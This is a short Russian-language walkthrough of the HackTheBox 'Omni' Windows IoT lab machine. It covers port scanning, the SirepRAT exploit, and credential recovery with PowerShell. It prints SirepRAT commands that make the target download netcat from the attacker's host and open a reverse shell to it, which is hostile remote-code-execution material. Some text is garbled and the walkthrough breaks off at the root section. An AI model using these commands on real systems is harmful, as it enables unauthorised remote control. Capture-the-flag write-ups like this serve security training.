Пентест лёгеньких Windows IoT систем
!Я лишь популяризирую данный контент!
В статье описанно прохождение машины Omni с HACKTHEBOX
Recon
Данная машина имеет IP адрес 10.10.10.204, который я добавляю в /etc/hosts.
Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент - адрес сканируемого хоста:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Много открытых портов, при этом на 8080 нас встречает HTTP аутентификация “Windows Device Portal”. Давайте узнаем что это:
Таким образом, это IoT мы можем найти найт
и соответствующий популярный эксплоит SirepRAT.
Entry Point
Запускаем на локальной машине веб сервер.
sudo python3 -m http.server 80
Скачаем на удаленную машину netcat, запустим листенер и выполним реверс шелл с помощью netcat.
python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell IWR -Uri http://10.10.14.112/nc64.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe" python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.112 4321" --v
Из программного обеспечения имеется только PowerShell. Просмотрим все файлы, включая вложенные директории, с целью найти что-нибудь интересное. И мы находим.
Get-ChildItem -Path "C:\Program Files" –Recurse -force
В данном файле находим учетные данные двух пользователей. Давайте авторизуемся на веб сервере. И в консоле кинем еще один реверс шелл.
Users
Но сразу забрать флаг не вышло.
$userTXT = Import-CliXml -Path C:\Data\Users\app\user.txt $userTXT.GetNetworkCredential().Password
Root
Теперь проделаем все те же функции от имени администратора.